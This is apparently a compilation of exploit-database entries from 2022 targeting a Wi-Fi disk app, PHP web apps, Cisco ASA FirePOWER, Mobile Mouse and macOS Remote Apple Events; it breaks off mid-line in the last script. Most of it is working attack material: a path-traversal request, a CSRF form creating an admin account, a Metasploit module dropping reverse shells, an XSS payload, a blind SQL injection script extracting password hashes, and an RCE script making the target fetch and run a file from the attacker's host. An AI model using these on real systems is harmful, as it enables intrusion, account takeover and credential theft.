<pre><code># Exploit Title: Wifi HD Wireless Disk Drive Local File Inclusion<br /># Date: Aug 13, 2022<br /># Exploit Author: Chokri Hammedi<br /># Vendor Homepage: http://www.savysoda.com<br /># Software Link: https://apps.apple.com/us/app/wifi-hd-wireless-disk-drive/<br />id311170976<br /># Version: 11<br /># Tested on: iPhone OS 15_5<br /><br /><br /><br /><br /><br /><br /><br />GET /../../../../../../../../../../../../../../../../etc/hosts HTTP/1.1<br />Host: 192.168.1.100<br />Connection: close<br />Upgrade-Insecure-Requests: 1<br />Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8<br />User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 15_5 like Mac OS X)<br />AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.5 Safari/604.1<br />Referer: http://192.168.1.103/<br />Accept-Language: en-GB,en-US;q=0.9,en;q=0.8<br />Accept-Encoding: gzip, deflate<br /><br /><br />-----------------<br /><br />HTTP/1.1 200 OK<br />Content-Disposition: attachment<br />Content-Type: application/download<br />Content-Length: 213<br />Accept-Ranges: bytes<br />Date: Sat, 13 Aug 2022 03:33:30 GMT<br /><br />##<br /># Host Database<br />#<br /># localhost is used to configure the loopback interface<br /># when the system is booting. Do not change this entry.<br />##<br />127.0.0.1 localhost<br />255.255.255.255 broadcasthost<br />::1 localhost<br /></code></pre>
<pre><code># Exploit Title: Online Employee Leave Management System 1.0 - Cross-Site Request Forgery (addemployee.php)<br /># Date: 05/09/2022<br /># Exploit Author: Amolo Hunters<br /># Software Link: https://www.sourcecodester.com/php/15374/online-employee-leave-management-system-php-free-source-code.html<br /># Version: 1.0<br /># Tested on: Linux<br /><br />Title:<br />================<br />Online Employee Leave Management System 1.0 - Cross-Site Request Forgery (addemployee.php)<br /><br />Summary:<br />================<br />The Online Employee Leave Management System suffers from a vulnerability called Cross-Site Request Forgery that affects the addemployee.php application used to add employees with administrative privileges. By failing to block against this attack, malicious users can take advantage of this weakness to spoof a request leading to the creation of a new account with administrative privileges.<br /><br />Severity Level:<br />================<br />5.4 (Medium)<br />CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N<br /><br />Affected Product:<br />================<br />Online Employee Leave Management System v1.0<br /><br />Steps to Reproduce:<br />================<br /><br />1. Create an HTML file and paste the following code:<br /><br /><html><br /><title>Online Employee Leave Management System (addemployee.php) CSRF PoC</title><br /><center><br /><h1>Online Employee Leave Management System (addemployee.php) CSRF PoC</h1><br /><p>by Amolo Hunters</p><br /><form action="http://target.com/elms/admin/addemployee.php" method="POST"><br /><input type="hidden" name="empcode" value="1337" /><br /><input type="hidden" name="firstName" value="AmoloHT" /><br /><input type="hidden" name="lastName" value="PoC" /><br /><input type="hidden" name="email" value="amoloht@poc.com" /><br /><input type="hidden" name="password" value="hacker123" /><br /><input type="hidden" name="confirmpassword" value="hacker123" /><br /><input type="hidden" name="gender" value="Other" /><br /><input type="hidden" name="dob" value="3 June, 2022" /><br /><input type="hidden" name="department" value="Information Technology" /><br /><input type="hidden" name="country" value="Brazil" /><br /><input type="hidden" name="city" value="PoC" /><br /><input type="hidden" name="address" value="PoC" /><br /><input type="hidden" name="mobileno" value="0000000000" /><br /><input type="hidden" name="add" value="" /><br /><input type="submit" value="Submit request" /><br /></form><br /></center><br /></html><br /><br />2. Save the file and run it in the browser<br />Note: you need to be logged in as an administrator<br /></code></pre>
<pre><code>##<br /># This module requires Metasploit: https://metasploit.com/download<br /># Current source: https://github.com/rapid7/metasploit-framework<br />##<br /><br />class MetasploitModule < Msf::Exploit::Remote<br /> Rank = ExcellentRanking<br /><br /> prepend Msf::Exploit::Remote::AutoCheck<br /> include Msf::Exploit::Remote::HttpClient<br /> include Msf::Exploit::CmdStager<br /> include Msf::Exploit::FileDropper<br /><br /> def initialize(info = {})<br /> super(<br /> update_info(<br /> info,<br /> 'Name' => 'Cisco ASA-X with FirePOWER Services Authenticated Command Injection',<br /> 'Description' => %q{<br /> This module exploits an authenticated command injection vulnerability affecting<br /> Cisco ASA-X with FirePOWER Services. This exploit is executed through the ASA's<br /> ASDM web server and lands in the FirePower Services SFR module's Linux virtual<br /> machine as the root user. Access to the virtual machine allows the attacker to<br /> pivot to the inside network, and access the outside network. Also, the SFR<br /> virtual machine is running snort on the traffic flowing through the ASA, so<br /> the attacker should have access to this diverted traffic as well.<br /><br /> This module requires ASDM credentials in order to traverse the ASDM interface.<br /> A similar attack can be performed via Cisco CLI (over SSH), although that isn't<br /> implemented here.<br /><br /> Finally, it's worth noting that this attack bypasses the affects of the<br /> `lockdown-sensor` command (e.g. the virtual machine's bash shell shouldn't be<br /> available but this attack makes it available).<br /><br /> Cisco assigned this issue CVE-2022-20828. The issue affects all Cisco ASA that<br /> support the ASA FirePOWER module (at least Cisco ASA-X with FirePOWER Service,<br /> and Cisco ISA 3000). The vulnerability has been patched in ASA FirePOWER module<br /> versions 6.2.3.19, 6.4.0.15, 6.6.7, and 7.0.21. The following versions will<br /> receive no patch: 6.2.2 and earlier, 6.3.*, 6.5.*, and 6.7.*.<br /> },<br /> 'License' => MSF_LICENSE,<br /> 'Author' => [<br /> 'jbaines-r7' # Vulnerability discovery and Metasploit module<br /> ],<br /> 'References' => [<br /> [ 'CVE', '2022-20828' ],<br /> [ 'URL', 'https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-asasfr-cmd-inject-PE4GfdG' ],<br /> [ 'URL', 'https://www.rapid7.com/blog/post/2022/08/11/rapid7-discovered-vulnerabilities-in-cisco-asa-asdm-and-firepower-services-software/' ],<br /> [ 'URL', 'https://www.cisco.com/c/en/us/td/docs/security/asa/quick_start/sfr/firepower-qsg.html']<br /> ],<br /> 'DisclosureDate' => '2022-06-22',<br /> 'Platform' => ['unix', 'linux'],<br /> 'Arch' => [ARCH_CMD, ARCH_X64,],<br /> 'Privileged' => true,<br /> 'Targets' => [<br /> [<br /> 'Shell Dropper',<br /> {<br /> 'Platform' => 'unix',<br /> 'Arch' => ARCH_CMD,<br /> 'Type' => :unix_cmd,<br /> 'DefaultOptions' => {<br /> 'PAYLOAD' => 'cmd/unix/reverse_bash'<br /> }<br /> }<br /> ],<br /> [<br /> 'Linux Dropper',<br /> {<br /> 'Platform' => 'linux',<br /> 'Arch' => ARCH_X64,<br /> 'Type' => :linux_dropper,<br /> 'CmdStagerFlavor' => [ 'curl', 'wget' ],<br /> 'DefaultOptions' => {<br /> 'PAYLOAD' => 'linux/x64/meterpreter_reverse_tcp'<br /> }<br /> }<br /> ]<br /> ],<br /> 'DefaultTarget' => 1,<br /> 'DefaultOptions' => {<br /> 'RPORT' => 443,<br /> 'SSL' => true,<br /> 'MeterpreterTryToFork' => true<br /> },<br /> 'Notes' => {<br /> 'Stability' => [CRASH_SAFE],<br /> 'Reliability' => [REPEATABLE_SESSION],<br /> 'SideEffects' => [ARTIFACTS_ON_DISK]<br /> }<br /> )<br /> )<br /> register_options([<br /> OptString.new('TARGETURI', [true, 'Base path', '/']),<br /> OptString.new('USERNAME', [true, 'Username to authenticate with', '']),<br /> OptString.new('PASSWORD', [true, 'Password to authenticate with', '']),<br /> ])<br /> end<br /><br /> def check<br /> res = send_request_cgi({<br /> 'method' => 'GET',<br /> 'uri' => normalize_uri(target_uri.path, '/admin/exec/session+sfr+do+`id`'),<br /> 'headers' =><br /> {<br /> 'User-Agent' => 'ASDM/ Java/1',<br /> 'Authorization' => basic_auth(datastore['USERNAME'], datastore['PASSWORD'])<br /> }<br /> })<br /> return CheckCode::Unknown('The target did not respond to the check.') unless res<br /> return CheckCode::Safe('Authentication failed.') if res.code == 401<br /> return CheckCode::Unknown("Received unexpected HTTP status code: #{res.code}.") unless res.code == 200<br /><br /> if res.body.include?('Invalid do command uid=0(root)')<br /> return CheckCode::Vulnerable("Successfully executed the 'id' command.")<br /> end<br /><br /> CheckCode::Safe('The command injection does not appear to work.')<br /> end<br /><br /> def execute_command(cmd, _opts = {})<br /> # base64 encode the payload to work around bad characters and then uri encode<br /> # the whole thing before yeeting it at the server<br /> encoded_payload = Rex::Text.uri_encode("(base64 -d<<<#{Rex::Text.encode_base64(cmd)}|sh)&")<br /> res = send_request_cgi({<br /> 'method' => 'GET',<br /> 'uri' => normalize_uri(target_uri.path, "/admin/exec/session+sfr+do+`#{encoded_payload}`"),<br /> 'headers' =><br /> {<br /> 'User-Agent' => 'ASDM/ Java/1',<br /> 'Authorization' => basic_auth(datastore['USERNAME'], datastore['PASSWORD'])<br /> }<br /> })<br /><br /> if res<br /> fail_with(Failure::Unreachable, 'The target did not respond.') unless res<br /> fail_with(Failure::NoAccess, 'Could not log in. Verify credentials.') if res.code == 401<br /> fail_with(Failure::UnexpectedReply, "Received unexpected HTTP status code: #{res.code}.") unless res.code == 200<br /> end<br /><br /> if session_created?<br /> # technically speaking, bash can hold the connection open and skip all the res checks<br /> # also passing the res checks doesn't actually mean that the target was exploited so<br /> # check a session was created to get verification<br /> print_good('Session created!')<br /> else<br /> fail_with(Failure::NotVulnerable, 'The exploit was thrown but not session was created.')<br /> end<br /> end<br /><br /> def exploit<br /> print_status("Executing #{target.name} for #{datastore['PAYLOAD']}")<br /><br /> case target['Type']<br /> when :unix_cmd<br /> execute_command(payload.encoded)<br /> when :linux_dropper<br /> execute_cmdstager<br /> end<br /> end<br />end<br /></code></pre>
<pre><code># Exploit Title: Online Market Place Site v1.0 - Stored Cross-Site Scripting (XSS)<br /># Exploit Author: Joe Pollock<br /># Date: September 03, 2022<br /># Vendor Homepage: https://www.sourcecodester.com/php/15273/online-market-place-site-phpoop-free-source-code.html<br /># Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/omps.zip<br /># Tested on: Kali Linux, Apache, Mysql<br /># CVE: CVE-2022-30003 (RESERVED)<br /># Vendor: oretnom23<br /># Version: v1.0<br /># Exploit Description:<br /># Online Market Place Site v1.0 suffers from an authenticated stored Cross-Site Scripting (XSS) vulnerability allowing attackers to register<br /># as a Seller then create new products containing XSS payloads in the 'Product Title' and 'Short Description' fields.<br /><br />To reporduce:<br /><br />1. Sign as a Seller (or create an account) then add a product by navigating to 'Products' > 'Add New'.<br /><br />2. Add an XSS payload (e.g. <script>alert(1)</script>) within the 'Product Title' and/or 'Short Description' fields.<br /><br />3. Click 'SAVE' - the XSS payload(s) will be executed immediately or anytime the product is viewed.<br /><br /><br /></code></pre>
<pre><code># Exploit Title: Online Market Place Site v1.0 - Unauthenticated Blind Time-Based SQL Injection<br /># Exploit Author: Joe Pollock<br /># Date: September 03, 2022<br /># Vendor Homepage: https://www.sourcecodester.com/php/15273/online-market-place-site-phpoop-free-source-code.html<br /># Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/omps.zip<br /># Tested on: Kali Linux, Apache, Mysql<br /># CVE: CVE-2022-30004 (RESERVED)<br /># Vendor: oretnom23<br /># Version: v1.0<br /># Exploit Description:<br /># Online Market Place Site v1.0 suffers from an unauthenticated blind SQL Injection Vulnerability allowing remote attackers to dump the SQL database via time-based SQL injection.<br /># This script will retrieve a single username and associciated password hash from the omps_db database via blind, time-based SQL injection.<br /># By default, the username & hash retrieved will have an ID equal to zero in the database, i.e. the first username and password hash.<br /># Default behavior can be changed by setting the USERID variable. Sleep timings may also have to be adjusted to account for network latency.<br /># Ex: python3 omps.py 10.14.14.2<br />import sys, requests, urllib3<br />USERID=0<br /><br />def main():<br /> if len(sys.argv) != 2:<br /> print("(+) usage: %s <target>") % sys.argv[0]<br /> print('(+) eg: %s 192.168.121.103') % sys.argv[0]<br /> sys.exit(-1)<br /> ip = sys.argv[1]<br /> print("(+) Retrieving username and hash...")<br /> target = "http://%s/omps/classes/Users.php?f=save_user" % ip<br /> <br /> # Get username<br /> for p in range (1,30):<br /> injection_string = "AAAA' OR IF(ascii(MID((select username from omps_db.users LIMIT %d,1),%d,1))=[CHAR],sleep(1),0)-- -" % (USERID,p)<br /> for c in range(32, 126):<br /> files = {"username": (None, injection_string.replace("[CHAR]", str(c)))}<br /> #print(injection_string.replace("[CHAR]", str(c)))<br /> r = requests.post(target, files=files)<br /> if (r.elapsed.total_seconds() > 2):<br /> extracted_char = chr(c)<br /> sys.stdout.write(extracted_char)<br /> sys.stdout.flush()<br /> sys.stdout.write("\t")<br /> <br /> # Get password hash<br /> for p in range (1,65):<br /> injection_string = "AAAA' OR IF(ascii(MID((select password from omps_db.users LIMIT %d,1),%d,1))=[CHAR],sleep(1),0)-- -" % (USERID,p)<br /> for c in range(32, 126):<br /> files = {"username": (None, injection_string.replace("[CHAR]", str(c)))}<br /> #print(injection_string.replace("[CHAR]", str(c)))<br /> r = requests.post(target, files=files)<br /> if (r.elapsed.total_seconds() > 2):<br /> extracted_char = chr(c)<br /> sys.stdout.write(extracted_char)<br /> sys.stdout.flush()<br /> print("\n(+) done!")<br /> <br />if __name__ == "__main__":<br /> main()<br /></code></pre>
<pre><code># Exploit Title: Mobile Mouse 3.6.0.4 Remote Code Execution<br /># Date: Aug 09, 2022<br /># Exploit Author: Chokri Hammedi<br /># Vendor Homepage: https://mobilemouse.com/<br /># Software Link: https://www.mobilemouse.com/downloads/setup.exe<br /># Version: 3.6.0.4<br /># Tested on: Windows 10 Enterprise LTSC Build 17763<br /><br />#!/usr/bin/env python3<br /><br />import socket<br />from time import sleep<br />import argparse<br /><br />help = " Mobile Mouse 3.6.0.4 Remote Code Execution "<br />parser = argparse.ArgumentParser(description=help)<br />parser.add_argument("--target", help="Target IP", required=True)<br />parser.add_argument("--file", help="File name to Upload")<br />parser.add_argument("--lhost", help="Your local IP", default="127.0.0.1")<br /><br />args = parser.parse_args()<br /><br />host = args.target<br />command_shell = args.file<br />lhost = args.lhost<br />port = 9099 # Default Port<br /><br />s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)<br />s.connect((host, port))<br /><br />CONN = bytearray.fromhex("434F4E4E4543541E1E63686F6B7269<br />68616D6D6564691E6950686F6E651E321E321E04")<br />s.send(CONN)<br />run = s.recv(54)<br /><br />RUN = bytearray.fromhex("4b45591e3131341e721e4f505404")<br />s.send(RUN)<br />run = s.recv(54)<br /><br />sleep(0.5)<br /><br />download_string= f"curl http://{lhost}:8080/{command_shell} -o<br />c:\Windows\Temp\{command_shell}".encode('utf-8')<br />hex_shell = download_string.hex()<br />SHELL = bytearray.fromhex("4B45591E3130301E" + hex_shell + "1E04" +<br />"4b45591e2d311e454e5445521e04")<br />s.send(SHELL)<br />shell = s.recv(96)<br /><br />print ("Executing The Command Shell...")<br />sleep(5)<br />RUN2 = bytearray.fromhex("4b45591e3131341e721e4f505404")<br />s.send(RUN2)<br />run2 = s.recv(54)<br />sleep(0.8)<br />shell_string= f"c:\Windows\Temp\{command_shell}".encode('utf-8')<br />hex_run = shell_string.hex()<br />RUN3 = bytearray.fromhex("4B45591E3130301E" + hex_run + "1E04" +<br />"4b45591e2d311e454e5445521e04")<br />s.send(RUN3)<br />run3 = s.recv(96)<br /><br />print (" Take The Rose")<br /><br />sleep(50)<br />s.close()<br /></code></pre>
<pre><code>#!/usr/bin/env python<br /># -*- coding: UTF-8 -*-<br />#<br /># naval.py<br />#<br /># Apple macOS Remote Events Remote Memory Corruption Vulnerability<br />#<br /># Jeremy Brown [jbrown3264/gmail]<br />#<br /># =====<br /># Intro<br /># =====<br />#<br /># [eppc] Hello from AEServer<br />#<br /># Remote Apple Events is a core service and remote system administration and automation<br /># tool for Macs. It can be enabled via System Preferences -> Sharing and listens on<br /># port tcp/3031 and may be used in enterprise environments for remote administration.<br /># Sending malformed packets triggers a crash in the AEServer binary which may allow for<br /># arbitrary code execution on the remote machine within the context of the _eppc user.<br /># However, the crash is subtle as the service is automatically restarted and only a log<br /># in /Library/Logs/DiagnosticReports/AEServer_*.crash is generated if ReportCrash is enabled.<br />#<br /># Although a controlled, reliable crash at an arbitrary location is difficult, it was<br /># eventually achieved during testing with repeated characters in packets during sessions.<br />#<br /># Thread 0 crashed with X86 Thread State (64-bit):<br /># rax: 0x4242424242424242 rbx: 0x0000000000000006 rcx: 0x0000424242424240 rdx: 0x00000000000e6370<br /># rdi: 0x00007fb041c0ab40 rsi: 0x0000000103d3ba00 rbp: 0x00007ffeebef99f0 rsp: 0x00007ffeebef99b8<br /># r8: 0x0000000000000020 r9: 0x0000000000000002 r10: 0x00007fb041c00000 r11: 0x00007fb041c0e1c0<br /># r12: 0x000000000000000d r13: 0x00007fff8091afe0 r14: 0x00007fb041c251b0 r15: 0x00007fb041c25218<br /># rip: 0x00007fff202d541f rfl: 0x0000000000010202 cr2: 0x0000424242424260<br />#<br /># While debugging it looks like the process is crashing when trying to release or<br /># dereference memory that has been deallocated, likely a sign of a heap related bug<br /># such as a use-after-free bug.<br />#<br /># This code serves as a toolkit to help debug and trigger crashes, but as mentioned<br /># extensive testing was required to gain more precise control of rax/rcx. Also note<br /># that authentication is not required to trigger crashes service locally or remotely.<br />#<br /># =======<br /># Details<br /># =======<br />#<br /># Much of the functionality depends on running this locally on the target box, such<br /># as debugging with ReportCrash logs, but it can certainly trigger remote crashes too<br /># if you pass the --remote flag (disables local debugging stuff).<br />#<br /># $ ./naval.py 10.0.0.12 --fuzz // use --original to fuzz with the non-crashing packets<br /># ....<br />#<br /># $ head crashes.txt<br /># 1 - (0x7e @ 1) -> 0x20<br /># [many more truncated]<br />#<br /># $ ./naval.py 10.0.0.12 --sleep --replay "1:7e:1" // pkt:byte:index<br /># ....<br />#<br /># Then within 10 seconds, start the debugger on the local target.. GOGOGO<br />#<br /># $ sudo lldb -o "attach --name AEServer" -o c<br /># ....<br />#<br /># (lldb) c<br /># Process 50050 resuming<br /># Process 50050 stopped<br /># * thread #1, queue = 'com.apple.main-thread', stop reason = EXC_BAD_ACCESS (code=1, address=0x7fd1d0e1bd8)<br /># frame #0: 0x00007fff2028341f libobjc.A.dylib`objc_release + 31<br />#<br /># And now you can explore the crash<br />#<br /># One can also check to see AEServer receving packets:<br /># > dtrace -n 'syscall::*recv*:entry { printf("-> %s (pid=%d)", execname, pid); }' | grep AEServer<br />#<br /># ===<br /># Fix<br /># ===<br /># - Addressed in Monterey 12.3<br />#<br /># CVE-2022-22630<br />#<br /><br />import os<br />import sys<br />import argparse<br />import datetime<br />import time<br />import psutil<br />import shutil<br />import signal<br />import socket<br />import random<br />import re<br /><br />REPORT_DIR = '/Library/Logs/DiagnosticReports'<br />LOG_DIR = 'logs'<br /><br />PORT = 3031 # eppc<br /><br />CRASH_LOG = 'crashes' + str(datetime.datetime.now().strftime("%Y%m%d_%H%M%S")) + '.txt'<br />REPORT_CRASH = True<br />SLEEP_TIME = 10<br />MAX_BYTE = 255 # 0xff<br /><br />#<br /># original packets<br />#<br />PKT_1_ORIG = b'PPCT\x00\x00\x00\x01\x00\x00\x00\x01'<br />PKT_2_ORIG = b'\xe4LPRT\x01\xe1\x01\xe7\x06finder\xdf\xdb\xe3\x02\x01=\xdf\xdf\xdf\xdf\xd5\x00'<br />PKT_3_ORIG = b'\xe4SREQ\xdf\xdf\xdf\xdf\xdf\x01\xe7\x06finder\xdf\xdb\xe5\x04B{\xbf\xac\xdf\xdf\xdf\xdf\xdf\xdf\xdf\xdf\xdc\xe5\x04test\xdf\xdd\x00'<br />PKT_4_ORIG = b'\x16\x03\x01\x00\x92\x01\x00\x00\x8e\x03\x03\x61\x00\x8b\x66\x96\xc7\x08\xa2\xe8\x0e\x53\x13\xbd\xd3\x1c\x69\x12\x43\xd3\x03\xe2\xec\x8d\x61\x3d\x01\xed\x67\xd7\x62\xf8\xca\x00\x00\x2c\x00\xff\xc0\x2c\xc0\x2b\xc0\x24\xc0\x23\xc0\x0a\xc0\x09\xc0\x08\xc0\x30\xc0\x2f\xc0\x28\xc0\x27\xc0\x14\xc0\x13\xc0\x12\x00\x9d\x00\x9c\x00\x3d\x00\x3c\x00\x35\x00\x2f\x00\x0a\x01\x00\x00\x39\x00\x0a\x00\x08\x00\x06\x00\x17\x00\x18\x00\x19\x00\x0b\x00\x02\x01\x00\x00\x0d\x00\x12\x00\x10\x04\x01\x02\x01\x05\x01\x06\x01\x04\x03\x02\x03\x05\x03\x06\x03\x00\x05\x00\x05\x01\x00\x00\x00\x00\x00\x12\x00\x00\x00\x17\x00\x00'<br />PKT_5_ORIG = b'\x16\x03\x03\x00\x46\x10\x00\x00\x42\x41\x04\x8d\xd9\xbc\x5f\x9b\x0d\x86\x28\xda\x1f\xba\x75\xe3\x01\x06\x73\xf4\x28\xe2\xe5\x9b\x2e\xfc\x75\x0c\xad\x3d\x7d\xc8\x59\xc0\x20\xce\xcb\xdf\x87\x88\x09\x46\x1f\xf3\x97\x3f\xb8\xd1\xc8\xf5\x4b\xa9\x9f\xdc\xae\xba\x75\x50\xfa\x96\xd5\xcf\xa2\xa4\xec\x7b\x61'<br /><br />#<br /># crashing packets<br />#<br />PKT_1 = b'PPCT\x00\x00\x00\x01\x00\x00\x00\x01'<br />PKT_2 = b'\xe4LPRT\x01\xe1\x01\xe7\x06xxxyyy\xdf\xdb\xe3\x02\x01=\xdf\xdf\xdf\xdf\xd5\x00' # s/finder/xxxyyy<br /><br />class Naval(object):<br /> def __init__(self, args):<br /> self.host = args.host<br /> self.fuzz = args.fuzz<br /> self.replay = args.replay<br /> self.remote = args.remote<br /> self.reprofile = args.reprofile<br /> self.original = args.original<br /> self.sleep = args.sleep<br /><br /> self.pkt1 = None<br /> self.pkt2 = None<br /><br /> # original<br /> self.pkt3 = None<br /> self.pkt4 = None<br /> self.pkt5 = None<br /><br /> self.pkt_pick = 0<br /><br /> self.pkt_num = None<br /> self.byte = None<br /> self.index = None<br /><br /> self.logs = []<br /><br /> def run(self):<br /> if(self.remote):<br /> REPORT_CRASH = False<br /> else:<br /> REPORT_CRASH = True<br /><br /> if(REPORT_CRASH):<br /> #<br /> # sudo launchctl load -w /System/Library/LaunchAgents/com.apple.ReportCrash.plist<br /> #<br /> if('ReportCrash' not in (proc.name() for proc in psutil.process_iter())):<br /> print("ReportCrash isn't running, make sure it's enabled first\n")<br /> return -1<br /><br /> if(os.path.isdir(REPORT_DIR)):<br /> try:<br /> logs = os.listdir(REPORT_DIR)<br /> except Exception as error:<br /> print("failed to list %s: %s\n" % (REPORT_DIR, error))<br /> return -1<br /> else:<br /> print("dir %s doesn't exist, can't fuzz and check for crashes\n" % REPORT_DIR)<br /> return -1<br /><br /> if(self.original):<br /> # non-crashing<br /> self.pkt1 = PKT_1_ORIG<br /> self.pkt2 = PKT_2_ORIG<br /> self.pkt3 = PKT_3_ORIG<br /> self.pkt4 = PKT_4_ORIG<br /> self.pkt5 = PKT_5_ORIG<br /> else:<br /> # crashing<br /> self.pkt1 = PKT_1<br /> self.pkt2 = PKT_2<br /><br /> if(self.replay):<br /> if(len(self.replay.split(':')) != 3):<br /> print("invalid replay format: %s" % self.replay)<br /> return -1<br /><br /> replay = self.replay.split(':')<br /><br /> try:<br /> self.pkt_num = int(replay[0])<br /> except Exception as error:<br /> print("packet number %s is invalid: %s", (pkt_num, error))<br /> return -1<br /><br /> try:<br /> self.byte = int(replay[1], 16)<br /> except Exception as error:<br /> print("byte %s is invalid: %s", (byte, error))<br /> return -1<br /><br /> try:<br /> self.index = int(replay[2])<br /> except Exception as error:<br /> print("index %s is invalid: %s", (index, error))<br /> return -1<br /><br /> if(self.pkt_num == 1):<br /> pkt = self.modifyPacket(self.pkt1, self.byte, self.index)<br /><br /> if(pkt == None):<br /> return -1<br /> elif(self.pkt_num == 2):<br /> pkt = self.modifyPacket(self.pkt2, self.byte, self.index)<br /><br /> if(pkt == None):<br /> return -1<br /> else:<br /> print("pkt number must be 1 or 2")<br /> return -1<br /><br /> print("replaying packets\n")<br /><br /> self.showRepro(pkt)<br /><br /> if(self.reprofile):<br /> if(self.repro(self.reprofile) < 0):<br /> print("failed")<br /> return -1<br /><br /> return 0<br /><br /> #<br /> # fuzz each packet one after another<br /> #<br /> if(self.fuzz):<br /> print("fuzzing sequentially packet 1\n")<br /><br /> self.pkt_num = 1<br /><br /> if(self.fuzzPacketSeq(self.pkt1) < 0):<br /> print("failed")<br /> return -1<br /><br /> print("fuzzing sequentially packet 2\n")<br /><br /> self.pkt_num = 2<br /><br /> if(self.fuzzPacketSeq(self.pkt2) < 0):<br /> print("failed")<br /> return -1<br /><br /> if(self.original):<br /> self.pkt_num = 3<br /><br /> if(self.fuzzPacketSeq(self.pkt3) < 0):<br /> print("failed")<br /> return -1<br /><br /> self.pkt_num = 4<br /><br /> if(self.fuzzPacketSeq(self.pkt4) < 0):<br /> print("failed")<br /> return -1<br /><br /> self.pkt_num = 5<br /><br /> if(self.fuzzPacketSeq(self.pkt5) < 0):<br /> print("failed")<br /> return -1<br /> else:<br /> if(not self.replay):<br /> if(self.original):<br /> print("sending original packets for testing\n")<br /> else:<br /> print("sending packets to trigger crash\n")<br /><br /> self.showRepro([])<br /><br /> sock = self.getSock()<br /><br /> if(sock == None):<br /> return -1<br /><br /> try:<br /> sock.connect((self.host, PORT))<br /> except Exception as error:<br /> print("connect() failed: %s\n" % error)<br /> return -1<br /><br /> if(self.sleep):<br /> time.sleep(SLEEP_TIME)<br /><br /> try:<br /> sock.send(self.pkt1)<br /> sock.recv(256)<br /> except Exception as error:<br /> print("failed to send/recv packet 1: %s\n" % error)<br /> return -1<br /><br /> try:<br /> sock.send(self.pkt2)<br /> except Exception as error:<br /> print("failed to send packet 2: %s\n" % error)<br /> return -1<br /><br /> if(self.original):<br /> try:<br /> sock.send(PKT_3_ORIG)<br /> except Exception as error:<br /> print("failed to send packet 3: %s\n" % error)<br /> return -1<br /><br /> try:<br /> sock.send(PKT_4_ORIG)<br /> except Exception as error:<br /> print("failed to send packet 4: %s\n" % error)<br /> return -1<br /><br /> try:<br /> sock.send(PKT_5_ORIG)<br /> except Exception as error:<br /> print("failed to send packet 5: %s\n" % error)<br /> return -1<br /><br /> sock.close()<br /><br /> if(REPORT_CRASH):<br /> self.checkReports()<br /><br /> print("done\n")<br /><br /> return 0<br /><br /> def getSock(self):<br /> try:<br /> sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)<br /> sock.settimeout(1)<br /> except Exception as error:<br /> print("socket() failed: %s\n" % error)<br /> return None<br /><br /> return sock<br /><br /> def fuzzPacketSeq(self, packet):<br /> c = 0<br /> i = 0<br /><br /> #<br /> # flip each byte in the packet sequentially from 0 ... 255<br /> #<br /> while(i < len(packet)):<br /> while(c <= MAX_BYTE):<br /> pkt = bytearray(packet)<br /><br /> self.index = i<br /> self.byte = c<br /><br /> orig = pkt[self.index]<br /> pkt[self.index] = self.byte<br /><br /> print("pkt @ index=%d (%s -> %s)" % (self.index, hex(orig), hex(pkt[self.index])))<br /><br /> sock = self.getSock()<br /><br /> if(sock == None):<br /> return -1<br /><br /> try:<br /> sock.connect((self.host, PORT))<br /> except Exception as error:<br /> print("connect() failed: %s\n" % error)<br /> continue<br /><br /> if(self.sendPacket(sock, pkt) < 0):<br /> print("sendPacket() failed\n")<br /> return -1<br /><br /> sock.close()<br /><br /> self.showRepro(pkt)<br /><br /> if(REPORT_CRASH):<br /> self.checkReports()<br /><br /> c += 1<br /><br /> c = 0<br /> i += 1<br /><br /> return 0<br /><br /> def createPacket(self, pkt_name):<br /> n = random.randint(8,4096)<br /><br /> print("created \\x42 x %d for %s\n" % (n, pkt_name))<br /><br /> return str.encode('B' * n)<br /><br /> def modifyPacket(self, pkt, byte, index):<br /> if((index < 0) or (index >= len(pkt))):<br /> print("index must be 0 - %d\n" % (len(pkt)-1))<br /> return -1<br /><br /> pkt = pkt[:index] + bytes([byte]) + pkt[index + 1:]<br /><br /> return pkt<br /><br /> def sendPacket(self, sock, pkt):<br /> try:<br /> if(self.pkt_pick == 1):<br /> sock.send(pkt)<br /> else:<br /> sock.send(self.pkt1)<br /><br /> sock.recv(256)<br /> except socket.timeout:<br /> print("timed out")<br /> except Exception as error:<br /> print("send/recv failed for packet #1: %s\n" % error)<br /><br /> try:<br /> if(self.pkt_pick == 2):<br /> sock.send(pkt)<br /> else:<br /> sock.send(self.pkt2)<br /><br /> if(self.original):<br /> sock.recv(256) # not necessary for crashing packets 1 & 2<br /> except Exception as error:<br /> print("send/recv failed for packet #2: %s\n" % error)<br /><br /> if(self.original):<br /> try:<br /> if(self.pkt_pick == 3):<br /> sock.send(pkt)<br /> else:<br /> pick = random.randint(1,2)<br /><br /> #<br /> # pick=1 means self.pkt3 doesn't change<br /> #<br /><br /> if(pick == 2):<br /> self.pkt3 = self.createPacket('pkt3')<br /><br /> sock.send(self.pkt3)<br /><br /> sock.recv(256)<br /> except Exception as error:<br /> print("send/recv failed for packet #3: %s\n" % error)<br /><br /> try:<br /> if(self.pkt_pick == 4):<br /> sock.send(pkt)<br /> else:<br /> pick = random.randint(1,2)<br /><br /> if(pick == 2):<br /> self.pkt4 = self.createPacket('pkt4')<br /><br /> sock.send(self.pkt4)<br /><br /> sock.recv(256)<br /> except Exception as error:<br /> print("send/recv failed for packet #4: %s\n" % error)<br /><br /> try:<br /> if(self.pkt_pick == 5):<br /> sock.send(pkt)<br /> else:<br /> pick = random.randint(1,2)<br /><br /> if(pick == 2):<br /> self.pkt5 = self.createPacket('pkt5')<br /><br /> sock.send(self.pkt5)<br /><br /> sock.recv(256)<br /> except Exception as error:<br /> print("send/recv failed for packet #5: %s\n" % error)<br /><br /> return 0<br /><br /> def repro(self, filename):<br /> print("reproing crash with %s\n" % os.path.basename(filename))<br /><br /> try:<br /> with open(filename, 'r') as file:<br /> data = file.readlines()<br /> except Exception as error:<br /> print("failed to read file %s: %s" % (filename, error))<br /> return -1<br /><br /> try:<br /> self.pkt1 = bytes.fromhex(data[0].replace('\\x', ''))<br /> self.pkt2 = bytes.fromhex(data[1].replace('\\x', 